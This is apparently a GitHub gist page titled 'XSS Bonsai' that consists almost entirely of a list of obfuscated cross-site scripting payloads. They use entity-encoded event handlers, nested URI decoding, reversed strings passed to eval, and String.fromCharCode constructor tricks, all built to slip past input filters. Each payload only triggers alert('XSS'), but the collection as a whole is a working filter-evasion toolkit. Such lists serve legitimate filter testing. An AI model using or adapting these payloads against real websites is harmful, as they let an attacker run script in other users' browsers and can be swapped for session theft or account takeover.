Create a gist now

Instantly share code, notes, and snippets.

@nash716 /bonsai.js Secret
Last active Aug 29, 2015

What would you like to do?
XSS Bonsai
";eval(';)\'SSX\'(trela'.split('').reverse().join(''))//
\";top['\x61\x6C\x65\x72\x74']('\x58\x53\x53')//
'+&#0000112arent['aleraaaaat'.&#0000114eplace('aaaaa','')]('XaaaaaSaaaaaS'.&#0000114eplace('aaaaa','').&#0000114eplace('aaaaa',''))+'
"+parent['\141lert']('\130SS')+"",500000000000000000000,50000000000000000000001)}parent['ahogehogehogehogehogehogehogheogehogheogheoghowghoewghowghweoghweoghe'.charAt()]();//
\u003cscript\u003ealert('XabababababababSabababababababS'.\u0072eplace('ababababababab','').\u0072eplace('ababababababab',''));\u003c\u002fscript\u003easdasdsadasda
\\x3csc\u0072ipt\u003e\u0020alert('XababababababSababababababS'.\u0072ep\u006cace('abababababab','').\u0072ep\u006cace('abababababab',''));//\\x3c\u002fsc\u0072ipt\u003easfasasfddsadasdaasdasdad
<input/onchange="&#000097lert('&#000088;&#000083;&#000083;')">
<div/onclick="&#0000115etInterval('&#00097;&#000108ert(\'&#00088;&#00083;&#00083\')',1654);">asdasdasdasfgagdsfdas</div>
<span/oncontextmenu="&#000115etInterval('\u0009ale'+('\u0020rt(\'\u0058\u0053S\')').&#0000115ubstring(100000000000-99999999999),1655)">weiweiweiwei</span>
<pre/ondblclick="&#0000115etTimeout(&#0000100ecodeURIComponent(&#0000100ecodeURIComponent(&#0000100ecodeURIComponent(&#0000100ecodeURIComponent(&#0000100ecodeURIComponent(&#0000100ecodeURIComponent(&#0000100ecodeURIComponent(&#0000100ecodeURIComponent(&#0000100ecodeURIComponent(&#0000100ecodeURIComponent(&#0000100ecodeURIComponent(&#0000100ecodeURIComponent(&#0000100ecodeURIComponent(&#0000100ecodeURIComponent(&#0000100ecodeURIComponent(&#0000100ecodeURIComponent('%252525252525252525252525252561%25252525252525252525252525256c%252525252525252525252525252565%252525252525252525252525252572%252525252525252525252525252574%252525252525252525252525252528%252525252525252525252525252527%252525252525252525252525252558%252525252525252525252525252553%252525252525252525252525252553%252525252525252525252525252527%252525252525252525252525252529')))))))))))))))),1653-1653);">asdasdcxzsxasdasfghytfgreddsfgdsgagdsfdas</pre>
<ul/ondragstart="&#000115etTimeout(&#000100ecodeURIComponent(&#000100ecodeURIComponent(&#000100ecodeURIComponent(&#000100ecodeURIComponent(&#000100ecodeURIComponent(&#000100ecodeURIComponent(&#000100ecodeURIComponent(&#000100ecodeURIComponent(&#000100ecodeURIComponent(&#000100ecodeURIComponent(&#000100ecodeURIComponent(&#000100ecodeURIComponent(&#000100ecodeURIComponent(&#000100ecodeURIComponent(&#000100ecodeURIComponent(&#000100ecodeURIComponent('%2525252525252525252525252561%252525252525252525252525256c%2525252525252525252525252565%2525252525252525252525252572%2525252525252525252525252574%2525252525252525252525252528%2525252525252525252525252527%2525252525252525252525252558%2525252525252525252525252553%2525252525252525252525252553%2525252525252525252525252527%2525252525252525252525252529')))))))))))))))),1652-1652);">asdasdcxzsxasdasfghytfgredlkjhngtfrddsfgdsgagdsfdas</ul>
<li/ondragend="&#00115etTimeout(&#00100ecodeURIComponent(&#00100ecodeURIComponent(&#00100ecodeURIComponent(&#00100ecodeURIComponent(&#00100ecodeURIComponent(&#00100ecodeURIComponent(&#00100ecodeURIComponent(&#00100ecodeURIComponent(&#00100ecodeURIComponent(&#00100ecodeURIComponent(&#00100ecodeURIComponent(&#00100ecodeURIComponent(&#00100ecodeURIComponent(&#00100ecodeURIComponent(&#00100ecodeURIComponent(&#00100ecodeURIComponent('%25252525252525252525252561%2525252525252525252525256c%25252525252525252525252565%25252525252525252525252572%25252525252525252525252574%25252525252525252525252528%25252525252525252525252527%25252525252525252525252558%25252525252525252525252553%25252525252525252525252553%25252525252525252525252527%25252525252525252525252529')))))))))))))))),1651-1651);">asdasdcxzsxasdasfghytfgredlkhgkujhrtfgjhgrtfttsfgdsgagdsfdas</li>
<ol/oncopy="&#0115etTimeout(&#0100ecodeURIComponent(&#0100ecodeURIComponent(&#0100ecodeURIComponent(&#0100ecodeURIComponent(&#0100ecodeURIComponent(&#0100ecodeURIComponent(&#0100ecodeURIComponent(&#0100ecodeURIComponent(&#0100ecodeURIComponent(&#0100ecodeURIComponent(&#0100ecodeURIComponent(&#0100ecodeURIComponent(&#0100ecodeURIComponent(&#0100ecodeURIComponent(&#0100ecodeURIComponent(&#0100ecodeURIComponent('%252525252525252525252561%25252525252525252525256c%252525252525252525252565%252525252525252525252572%252525252525252525252574%252525252525252525252528%252525252525252525252527%252525252525252525252558%252525252525252525252553%252525252525252525252553%252525252525252525252527%252525252525252525252529')))))))))))))))),1650-1650);">asdasdcxkjhjklkjhzsxasdasfghytfgredlkhgkujhrtfgjhgrtfttsfgdsgagdsfdas</ol>
<dl/onbeforecopy="&#115etTimeout(&#100ecodeURIComponent(&#100ecodeURIComponent(&#100ecodeURIComponent(&#100ecodeURIComponent(&#100ecodeURIComponent(&#100ecodeURIComponent(&#100ecodeURIComponent(&#100ecodeURIComponent(&#100ecodeURIComponent(&#100ecodeURIComponent(&#100ecodeURIComponent(&#100ecodeURIComponent(&#100ecodeURIComponent(&#100ecodeURIComponent(&#100ecodeURIComponent(&#100ecodeURIComponent('%2525252525252525252561%252525252525252525256c%2525252525252525252565%2525252525252525252572%2525252525252525252574%2525252525252525252528%2525252525252525252527%2525252525252525252558%2525252525252525252553%2525252525252525252553%2525252525252525252527%2525252525252525252529')))))))))))))))),1649-1649);">vrhnfediufthkmrdlf</dl>
<dt/onselectstart="&#x000073;etTimeout(&#x000064;ecodeURIComponent(&#x000064;ecodeURIComponent(&#x000064;ecodeURIComponent(&#x000064;ecodeURIComponent(&#x000064;ecodeURIComponent(&#x000064;ecodeURIComponent(&#x000064;ecodeURIComponent(&#x000064;ecodeURIComponent(&#x000064;ecodeURIComponent(&#x000064;ecodeURIComponent(&#x000064;ecodeURIComponent(&#x000064;ecodeURIComponent(&#x000064;ecodeURIComponent(&#x000064;ecodeURIComponent(&#x000064;ecodeURIComponent(&#x000064;ecodeURIComponent('%25252525252525252561%2525252525252525256c%25252525252525252565%25252525252525252572%25252525252525252574%25252525252525252528%25252525252525252527%25252525252525252558%25252525252525252553%25252525252525252553%25252525252525252527%25252525252525252529')))))))))))))))),1648-1648);">vrhnfedjhgfhjiufthkmrdlf</dt>
<dd/ondragenter="&#00115etInterval(&#0000100ecodeURI(&#0000100ecodeURI(&#0000100ecodeURI(&#0000100ecodeURI(&#0000100ecodeURI(&#0000100ecodeURI(&#0000100ecodeURI(&#0000100ecodeURI(&#0000100ecodeURI(&#0000100ecodeURI(&#0000100ecodeURI(&#0000100ecodeURI(&#0000100ecodeURI(&#0000100ecodeURI(&#0000100ecodeURI(&#0000100ecodeURI('%252525252525252561%25252525252525256c%252525252525252565%252525252525252572%252525252525252574%252525252525252528%252525252525252527%252525252525252558%252525252525252553%252525252525252553%252525252525252527%252525252525252529')))))))))))))))),1453);">asdasdcxzsxasdasfghytfgreddsffvdcfvgbvgdsgagdsfdas</dd>
<table/ondragleave="&#0115etInterval(&#000100ecodeURI(&#000100ecodeURI(&#000100ecodeURI(&#000100ecodeURI(&#000100ecodeURI(&#000100ecodeURI(&#000100ecodeURI(&#000100ecodeURI(&#000100ecodeURI(&#000100ecodeURI(&#000100ecodeURI(&#000100ecodeURI(&#000100ecodeURI(&#000100ecodeURI(&#000100ecodeURI(&#000100ecodeURI('%2525252525252561%252525252525256c%2525252525252565%2525252525252572%2525252525252574%2525252525252528%2525252525252527%2525252525252558%2525252525252553%2525252525252553%2525252525252527%2525252525252529')))))))))))))))),1452);">asdasdcsregbdtnftrgbdbvexzsxasdasfghytfgreddsfgdsgagdsfdas</table>
<strike/ondrag="&#115etInterval(&#00100ecodeURI(&#00100ecodeURI(&#00100ecodeURI(&#00100ecodeURI(&#00100ecodeURI(&#00100ecodeURI(&#00100ecodeURI(&#00100ecodeURI(&#00100ecodeURI(&#00100ecodeURI(&#00100ecodeURI(&#00100ecodeURI(&#00100ecodeURI(&#00100ecodeURI(&#00100ecodeURI(&#00100ecodeURI('%25252525252561%2525252525256c%25252525252565%25252525252572%25252525252574%25252525252528%25252525252527%25252525252558%25252525252553%25252525252553%25252525252527%25252525252529')))))))))))))))),1451);">asdasdcxzsxsrbgdtfgrfvfecrvtgbfasdasfghytfgreddsfgdsgagdsfdas</strike>
<img/src="asdsgjiosforguhresokieleskd"/onerror="_=&#x000053tring.&#0000102romCharCode(0x0000000063,0x000000006f,0x000000006e,0x0000000073,0x0000000074,0x0000000072,0x0000000075,0x0000000063,0x0000000074,0x000000006f,0x0000000072),__=&#x000053tring.&#0000102romCharCode(0x0000000061,0x00000000006c,0x000000000065,0x000000000072,0x000000000074),___=&#x000053tring.&#0000102romCharCode(0x0000000058,0x000000000053,0x000000000053),{}[_][_](__+'(\''+___+'\')')()">
<isindex/onpaste="_=&#x053tring.&#0102romCharCode(0x0000063,0x000006f,0x000006e,0x0000073,0x0000074,0x0000072,0x0000075,0x0000063,0x0000074,0x000006f,0x0000072),__=&#x053tring.&#0102romCharCode(0x0000061,0x000006c,0x0000065,0x0000072,0x0000074),___=&#x053tring.&#0102romCharCode(0x0000058,0x000000053,0x000000053),{}[_][_](__+'(\''+___+'\')')()">
<h1/onmouseover="&#x000061;&#x00006c;&#x000065;&#x000072;&#x000074;&#x000028;&#x000027;&#x000058;&#x000053;&#x000053;&#x000027;&#x000029;">sfsdfdsfdfdsfdsfdfdsfdsfdsfdafassdsasfdsfhrtf</h1>
<h2/onmouseenter="&#x00061;&#x0006c;&#x00065;&#x00072;&#x00074;&#x00028;&#x00027;&#x00058;&#x00053;&#x00053;&#x00027;&#x00029;">gingfleaivjmdsojmlfdijsmfldv</h2>
<h3/onmouseleave="&#x0061;&#x006c;&#x0065;&#x0072;&#x0074;&#x0028;&#x0027;&#x0058;&#x0053;&#x0053;&#x0027;&#x0029;">gingfleaivjmaregddsojmlfdijsmfldv</h3>
<h4/onmouseout="&#x061;&#x06c;&#x065;&#x072;&#x074;&#x028;&#x027;&#x058;&#x053;&#x053;&#x027;&#x029;">gingfleaivjfdsfsdfgfedfmaregddsojmlfdijsmfldv</h4>
<h5/onmousedown="wi&#110dow[String.fromCharCode(501-404,501-393,501-400,501-387,501-385)](String.fromCharCode(10088-10000,10083-10000,10083-10000))">gingfleaivjfdsffgfdgghfdfsgfdsdfgfedfmaregddsojmlfdijsmfldv</h5>
<h6/onmouseup="&#0097;&#00108;&#00101;&#00114;&#00116;&#0040;&#0039;&#0088;&#0083;&#0083;&#0039;&#0041;">gingfleaivjfdsffgfdgghfdfsgfdsdfgfedfmaregddsojfsaadffdsadfsalfdijsmfldv</h6>
<button/onfocusout="&#097;&#0108;&#0101;&#0114;&#0116;&#040;&#039;&#088;&#083;&#083;&#039;&#041;">gingflfdghfgfdsfgfdsdeaivjfdsffgfdgghfdfsgsdadsfdsafdsdfgfedfmaregddsojfsaadffdsadfsalfdijsmfldv</button>
<select/onfocusin="&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;">gingflfdfghfdghjkhgfdghjkghfgfdsfgfdsdeaivjfdsffgfdgghfdfsgsdadsfdsafdsdfgfedfmaregddsojfsaadffdsadfsalfdijsmfldv</select>
<script>alert('XSS');</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment